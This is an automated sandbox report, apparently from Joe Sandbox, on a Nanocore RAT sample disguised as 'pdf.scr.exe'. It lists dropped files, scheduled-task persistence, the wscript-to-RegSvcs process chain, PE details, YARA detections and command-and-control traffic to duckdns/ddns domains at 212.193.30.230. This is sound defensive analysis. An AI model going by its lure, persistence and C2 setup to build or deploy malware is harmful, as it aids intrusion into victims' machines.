                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1309
                                                  Entropy (8bit):5.0990514427386
                                                  Encrypted:false
                                                  SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK04kxtn:cbk4oL600QydbQxIYODOLedq35kj
                                                  MD5:77AF6D1744407EBD7E0CEC16F3C7168D
                                                  SHA1:FF4E58917D1AB719E40C68542F663121299DAE67
                                                  SHA-256:A519EB5414D05AC7565B5399D9F1EF717D6846695221B21B51820AA69120EDDC
                                                  SHA-512:529FD47B0605315DDD60D10A99A4830C234C5046C9EE575524C3FC85105C701DCD8EEA4F2A1D8AE444D2E42A2CEF37CE23FB9A2BAF4CB0BAA91B590FB555E691
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

                                                  C:\Users\user\AppData\Local\Temp\tmp8D34.tmp

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1310
                                                  Entropy (8bit):5.109425792877704
                                                  Encrypted:false
                                                  SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0R3xtn:cbk4oL600QydbQxIYODOLedq3S3j
                                                  MD5:5C2F41CFC6F988C859DA7D727AC2B62A
                                                  SHA1:68999C85FC7E37BAB9216E0099836D40D4545C1C
                                                  SHA-256:98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
                                                  SHA-512:B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

                                                  C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8
                                                  Entropy (8bit):3.0
                                                  Encrypted:false
                                                  SSDEEP:3:ZSp:Q
                                                  MD5:6C844091DCB061AD2B62761D1939F235
                                                  SHA1:813C89B6606B3A5510FD924A02BAFCC6FE2B8574
                                                  SHA-256:FBC2997715CCA9BD5F3F08FB0FABD33DD3D13489C40E47952208ED854127AA2C
                                                  SHA-512:62CE0F17F06E366D2CBE8C1C73569D39D50BA3EB2403C8AAD48314B213166A3DC5538375992D3FD99827565B720B029244379A854EAA189EE3B0E0F33D50D665
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:Fb..7..H

                                                  C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):46
                                                  Entropy (8bit):4.3523814564716385
                                                  Encrypted:false
                                                  SSDEEP:3:oNUkh4E2J5xAIwGMNn:oN923fA
                                                  MD5:E01C7B4BFFC4D8966DFDD6831E4904F7
                                                  SHA1:FE638E970FB82742E2C4D7EA3AE7E043589304FB
                                                  SHA-256:ECFA3D73848685C232F4B352A5E24F4995B7D55FF4130A26B7BAEB3839280300
                                                  SHA-512:FD9C41391E076E66F9A65DF18CA790EF06518B8033A5D24BF631E6E7F5EACECF34AD2AA7197FEB8B8FC7ED571A3BEFA0C8C940631F6EE5C0F5996D703B6AC50A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:C:\Users\user\AppData\Local\Temp\RegSvcs.exe

                                                  C:\Users\user\temp\lvgkma.msc

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):90
                                                  Entropy (8bit):4.969700668999775
                                                  Encrypted:false
                                                  SSDEEP:3:YRRvutvEOVBJcRAoovKXRGdY2JRMow7:AvCEOVHcoXzpi
                                                  MD5:B48D7F5C0CC7E6A4C737BE0D827B9867
                                                  SHA1:906E2605871B8F319FA2A455C06F2E53940ED777
                                                  SHA-256:B2BACD88BAFE8C668A45AB03A2D5647A9BDDA6CF1361FC821D5A70480B8CCB69
                                                  SHA-512:9E3F4634AF71BCD600576BBD09EBC569E8D5D286ACD07D8E516AD61A80D3447156AEACB59194F24D9C39A1BBE666E038375A94E4AA5A7821D971FD166A7DD694
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:[S3tt!ng]..stpth=%localappdata%\temp..Key=Chrome..Dir3ctory=Folder8_410..ExE_c=itugx.exe..

                                                  \Device\ConDrv

                                                  Download File
                                                  Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1141
                                                  Entropy (8bit):4.44831826838854
                                                  Encrypted:false
                                                  SSDEEP:24:zKLXkb4DObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0b4DQntKKH1MqJC
                                                  MD5:1AEB3A784552CFD2AEDEDC1D43A97A4F
                                                  SHA1:804286AB9F8B3DE053222826A69A7CDA3492411A
                                                  SHA-256:0BC438F4B1208E1390C12D375B6CBB08BF47599D1F24BD07799BB1DF384AA293
                                                  SHA-512:5305059BA86D5C2185E590EC036044B2A17ED9FD9863C2E3C7E7D8035EF0C79E53357AF5AE735F7D432BC70156D4BD3ACB42D100CFB05C2FB669EA22368F1415
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Microsoft (R) .NET Framework Services Installation Utility Version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):7.826498922764083
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:026910003102350.pdf.scr.exe
                                                  File size:1064658
                                                  MD5:c2a80ccf6362bba805072de9ce963ea5
                                                  SHA1:c7a0ca8b35e2c08e69f48d754dbdbf20f2d1d53f
                                                  SHA256:592217d2590ae9ca688346688b2d7d13a78190f9562889597ebb79060136034c
                                                  SHA512:377fbc8008b63f9380ebe0a90db28a191fd3f0eea97dd10e6f16607eb42c51f713cbfb744f2ce73b74093f4866a05e3b00ec7f8b57e2bff2c6a9c8f2118ce707
                                                  SSDEEP:24576:9TbBv5rUeTA/TYaxVKPijItG0bKL1xRMa2LSmnbrDrF:XBvIHBMG02L1N29rDx
                                                  TLSH:95351202BEC196B2D0A3093256767721B97DB9601F68CEDFA3D1466CAD325C0E7317B2
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

                                                  File Icon

                                                  Icon Hash:938c8c90b2ea6ab2

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x41f530
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:5
                                                  OS Version Minor:1
                                                  File Version Major:5
                                                  File Version Minor:1
                                                  Subsystem Version Major:5
                                                  Subsystem Version Minor:1
                                                  Import Hash:12e12319f1029ec4f8fcbed7e82df162

                                                  Entrypoint Preview

                                                  Instruction
                                                  call 00007FF9B4BF9B7Bh
                                                  jmp 00007FF9B4BF948Dh
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  push ebp
                                                  mov ebp, esp
                                                  push esi
                                                  push dword ptr [ebp+08h]
                                                  mov esi, ecx
                                                  call 00007FF9B4BEC2D7h
                                                  mov dword ptr [esi], 004356D0h
                                                  mov eax, esi
                                                  pop esi
                                                  pop ebp
                                                  retn 0004h
                                                  and dword ptr [ecx+04h], 00000000h
                                                  mov eax, ecx
                                                  and dword ptr [ecx+08h], 00000000h
                                                  mov dword ptr [ecx+04h], 004356D8h
                                                  mov dword ptr [ecx], 004356D0h
                                                  ret
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  push ebp
                                                  mov ebp, esp
                                                  push esi
                                                  mov esi, ecx
                                                  lea eax, dword ptr [esi+04h]
                                                  mov dword ptr [esi], 004356B8h
                                                  push eax
                                                  call 00007FF9B4BFC91Fh
                                                  test byte ptr [ebp+08h], 00000001h
                                                  pop ecx
                                                  je 00007FF9B4BF961Ch
                                                  push 0000000Ch
                                                  push esi
                                                  call 00007FF9B4BF8BD9h
                                                  pop ecx
                                                  pop ecx
                                                  mov eax, esi
                                                  pop esi
                                                  pop ebp
                                                  retn 0004h
                                                  push ebp
                                                  mov ebp, esp
                                                  sub esp, 0Ch
                                                  lea ecx, dword ptr [ebp-0Ch]
                                                  call 00007FF9B4BEC252h
                                                  push 0043BEF0h
                                                  lea eax, dword ptr [ebp-0Ch]
                                                  push eax
                                                  call 00007FF9B4BFC3D9h
                                                  int3
                                                  push ebp
                                                  mov ebp, esp
                                                  sub esp, 0Ch
                                                  lea ecx, dword ptr [ebp-0Ch]
                                                  call 00007FF9B4BF9598h
                                                  push 0043C0F4h
                                                  lea eax, dword ptr [ebp-0Ch]
                                                  push eax
                                                  call 00007FF9B4BFC3BCh
                                                  int3
                                                  jmp 00007FF9B4BFDE57h
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  push 00422900h
                                                  push dword ptr fs:[00000000h]

                                                  Rich Headers

                                                  Programming Language:
                                                  • [ C ] VS2008 SP1 build 30729
                                                  • [IMP] VS2008 SP1 build 30729

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000x4a8c.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x690000x233c.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000x31bdc0x31c00False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata0x330000xaec00xb000False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data0x3e0000x247200x1000False0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .didat0x630000x1900x200False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rsrc0x640000x4a8c0x4c00False0.6105571546052632data6.391160230365552IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0x690000x233c0x2400False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountry
                                                  PNG0x645240xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States
                                                  PNG0x6506c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States
                                                  RT_ICON0x666180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192
                                                  RT_DIALOG0x667400x286dataEnglishUnited States
                                                  RT_DIALOG0x669c80x13adataEnglishUnited States
                                                  RT_DIALOG0x66b040xecdataEnglishUnited States
                                                  RT_DIALOG0x66bf00x12edataEnglishUnited States
                                                  RT_DIALOG0x66d200x338dataEnglishUnited States
                                                  RT_DIALOG0x670580x252dataEnglishUnited States
                                                  RT_STRING0x672ac0x1e2dataEnglishUnited States
                                                  RT_STRING0x674900x1ccdataEnglishUnited States
                                                  RT_STRING0x6765c0x1b8dataEnglishUnited States
                                                  RT_STRING0x678140x146dataEnglishUnited States
                                                  RT_STRING0x6795c0x46cdataEnglishUnited States
                                                  RT_STRING0x67dc80x166dataEnglishUnited States
                                                  RT_STRING0x67f300x152dataEnglishUnited States
                                                  RT_STRING0x680840x10adataEnglishUnited States
                                                  RT_STRING0x681900xbcdataEnglishUnited States
                                                  RT_STRING0x6824c0xd6dataEnglishUnited States
                                                  RT_GROUP_ICON0x683240x14data
                                                  RT_MANIFEST0x683380x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States

                                                  Imports

                                                  DLLImport
                                                  KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                  OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                  gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                                  Possible Origin

                                                  Language of compilation systemCountry where language is spokenMap
                                                  EnglishUnited States

                                                  Network Behavior

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Feb 2, 2023 08:09:58.131228924 CET4970060705192.168.2.5212.193.30.230
                                                  Feb 2, 2023 08:10:01.243844986 CET4970060705192.168.2.5212.193.30.230
                                                  Feb 2, 2023 08:10:07.244303942 CET4970060705192.168.2.5212.193.30.230
                                                  Feb 2, 2023 08:10:24.303241014 CET4970560705192.168.2.5212.193.30.230
                                                  Feb 2, 2023 08:10:27.408564091 CET4970560705192.168.2.5212.193.30.230
                                                  Feb 2, 2023 08:10:33.418741941 CET4970560705192.168.2.5212.193.30.230
                                                  Feb 2, 2023 08:10:49.414972067 CET4970760705192.168.2.5212.193.30.230
                                                  Feb 2, 2023 08:10:52.435837984 CET4970760705192.168.2.5212.193.30.230
                                                  Feb 2, 2023 08:10:58.508714914 CET4970760705192.168.2.5212.193.30.230
                                                  Feb 2, 2023 08:11:07.956806898 CET4970960705192.168.2.5212.193.30.230
                                                  Feb 2, 2023 08:11:11.050592899 CET4970960705192.168.2.5212.193.30.230
                                                  Feb 2, 2023 08:11:17.053057909 CET4970960705192.168.2.5212.193.30.230

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Feb 2, 2023 08:09:57.770723104 CET6084153192.168.2.58.8.8.8
                                                  Feb 2, 2023 08:09:57.877348900 CET53608418.8.8.8192.168.2.5
                                                  Feb 2, 2023 08:10:24.189878941 CET4972453192.168.2.58.8.8.8
                                                  Feb 2, 2023 08:10:24.299720049 CET53497248.8.8.8192.168.2.5
                                                  Feb 2, 2023 08:10:49.296843052 CET6532353192.168.2.58.8.8.8
                                                  Feb 2, 2023 08:10:49.405663013 CET53653238.8.8.8192.168.2.5
                                                  Feb 2, 2023 08:11:07.934437990 CET6344653192.168.2.58.8.8.8
                                                  Feb 2, 2023 08:11:07.953950882 CET53634468.8.8.8192.168.2.5

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Feb 2, 2023 08:09:57.770723104 CET192.168.2.58.8.8.80x830aStandard query (0)december2n.duckdns.orgA (IP address)IN (0x0001)false
                                                  Feb 2, 2023 08:10:24.189878941 CET192.168.2.58.8.8.80x17beStandard query (0)december2n.duckdns.orgA (IP address)IN (0x0001)false
                                                  Feb 2, 2023 08:10:49.296843052 CET192.168.2.58.8.8.80x8dd7Standard query (0)december2n.duckdns.orgA (IP address)IN (0x0001)false
                                                  Feb 2, 2023 08:11:07.934437990 CET192.168.2.58.8.8.80x1c9aStandard query (0)december2nd.ddns.netA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Feb 2, 2023 08:09:57.877348900 CET8.8.8.8192.168.2.50x830aNo error (0)december2n.duckdns.org212.193.30.230A (IP address)IN (0x0001)false
                                                  Feb 2, 2023 08:10:24.299720049 CET8.8.8.8192.168.2.50x17beNo error (0)december2n.duckdns.org212.193.30.230A (IP address)IN (0x0001)false
                                                  Feb 2, 2023 08:10:49.405663013 CET8.8.8.8192.168.2.50x8dd7No error (0)december2n.duckdns.org212.193.30.230A (IP address)IN (0x0001)false
                                                  Feb 2, 2023 08:11:07.953950882 CET8.8.8.8192.168.2.50x1c9aNo error (0)december2nd.ddns.net212.193.30.230A (IP address)IN (0x0001)false

                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:08:09:32
                                                  Start date:02/02/2023
                                                  Path:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  Imagebase:0xcc0000
                                                  File size:1064658 bytes
                                                  MD5 hash:C2A80CCF6362BBA805072DE9CE963EA5
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low

                                                  General

                                                  Target ID:1
                                                  Start time:08:09:46
                                                  Start date:02/02/2023
                                                  Path:C:\Windows\SysWOW64\wscript.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbe
                                                  Imagebase:0x50000
                                                  File size:147456 bytes
                                                  MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000001.00000003.359286205.00000000036B5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  Reputation:high

                                                  General

                                                  Target ID:2
                                                  Start time:08:09:54
                                                  Start date:02/02/2023
                                                  Path:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe" rnnsh.xls
                                                  Imagebase:0x310000
                                                  File size:936754 bytes
                                                  MD5 hash:8A57722EC9067FAAA9FF2980C5F02838
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
